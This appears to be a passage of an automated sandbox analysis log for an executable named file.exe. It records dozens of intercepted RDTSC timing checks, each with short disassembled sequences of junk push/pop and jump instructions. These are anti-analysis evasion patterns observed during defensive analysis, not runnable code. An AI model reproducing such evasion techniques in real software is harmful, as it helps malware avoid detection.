                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EC10 second address: D5EC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EDA1 second address: D5EDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FAh 0x00000009 pop edx 0x0000000a jno 00007F699913D30Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EDCE second address: D5EDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EDD2 second address: D5EDD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EDD6 second address: D5EE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F6999135DF5h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 js 00007F6999135DEEh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EE00 second address: D5EE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EE06 second address: D5EE0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5EE0B second address: D5EE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F699913D2F6h 0x0000000a jbe 00007F699913D2F6h 0x00000010 popad 0x00000011 pushad 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F3A2 second address: D5F3C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6999135DEAh 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F3C2 second address: D5F3E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 je 00007F699913D2F8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jne 00007F699913D2FCh 0x00000015 jne 00007F699913D2F6h 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5F3E4 second address: D5F3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D689C5 second address: D689C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D689C9 second address: D68A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F6999135DEEh 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F6999135DE6h 0x00000016 popad 0x00000017 pushad 0x00000018 jns 00007F6999135DEEh 0x0000001e jmp 00007F6999135DF4h 0x00000023 push eax 0x00000024 push edx 0x00000025 je 00007F6999135DE6h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D676F3 second address: D676F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D676F7 second address: D676FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67433 second address: D6743C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68170 second address: D68174 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D682D9 second address: D682FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F699913D309h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D682FA second address: D682FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D682FF second address: D68304 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6BDD4 second address: D6BDEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F6999135DEDh 0x0000000c jg 00007F6999135DE6h 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6BDEF second address: D6BE07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D2FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F699913D2F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6EA81 second address: D6EA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F6999135DEFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6EA9A second address: D6EAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6EAA3 second address: D6EAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6EAA7 second address: D6EAE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F699913D2FDh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F699913D300h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71328 second address: D7135C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6999135DF0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6999135DF8h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7135C second address: D71368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71368 second address: D7136C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7136C second address: D71370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE570C second address: CE5727 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE5727 second address: CE572D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70F34 second address: D70F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F6999135DFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70F5C second address: D70F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70F62 second address: D70F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70F66 second address: D70F6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70F6C second address: D70F7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F6999135DE6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7109F second address: D710A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D710A8 second address: D710AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D710AD second address: D710B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D710B3 second address: D710BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6999135DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75E78 second address: D75E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75E7C second address: D75E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75E82 second address: D75E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D75E8A second address: D75E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75E8E second address: D75EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F699913D305h 0x00000014 pop esi 0x00000015 jc 00007F699913D2FCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75EC7 second address: D75ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6999135DECh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75314 second address: D75323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75723 second address: D75747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F6999135DF6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D75A6A second address: D75A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78668 second address: D7868B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007F6999135DF2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7868B second address: D78698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F699913D2F6h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78698 second address: D7869E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78805 second address: D7881D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F699913D2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F699913D2FAh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7EAA9 second address: D7EAAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D350 second address: D7D355 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D7EF second address: D7D7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7D7F3 second address: D7D804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7DDC0 second address: D7DDD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F6999135DEAh 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86B9F second address: D86BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D86BA5 second address: D86BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85188 second address: D851A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F699913D2FAh 0x0000000d pushad 0x0000000e popad 0x0000000f jbe 00007F699913D2F6h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D851A3 second address: D851AD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6999135DEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D851AD second address: D851B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8544E second address: D85454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85DB3 second address: D85DDC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F699913D2F6h 0x00000008 jmp 00007F699913D2FFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F699913D2FBh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D85DDC second address: D85DF3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6999135DE6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F6999135DEBh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AC03 second address: D8AC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B376 second address: D8B395 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6999135DF9h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B395 second address: D8B39A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9782E second address: D97832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979A3 second address: D979B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979B1 second address: D979BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979BF second address: D979CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F699913D2F6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979CB second address: D979EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979EC second address: D979FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007F699913D2F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D979FD second address: D97A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97A01 second address: D97A15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F699913D2FEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97B5C second address: D97B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6999135DE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97B66 second address: D97B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F699913D2FFh 0x0000000f jmp 00007F699913D307h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97E06 second address: D97E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D97E0E second address: D97E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9893E second address: D98959 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F6999135DF1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B4EB second address: D9B507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D2FFh 0x00000007 jc 00007F699913D2F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA29DD second address: DA29F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F6999135DEFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA29F2 second address: DA29F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEB79 second address: DAEB7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4EEA second address: DB4F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F699913D308h 0x00000008 jo 00007F699913D2F6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F699913D2F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4F16 second address: DB4F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70F1 second address: DB70F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70F9 second address: DB70FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB70FD second address: DB711E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F699913D2FAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F699913D2FDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB711E second address: DB7123 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB7231 second address: DB7241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB8CC8 second address: DB8CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC864D second address: DC8652 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8520 second address: DC8534 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6999135DEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCFB0E second address: DCFB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCFC50 second address: DCFC78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEBh 0x00000007 jmp 00007F6999135DF0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f ja 00007F6999135DE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0131 second address: DD0143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F699913D2FAh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD0143 second address: DD0147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
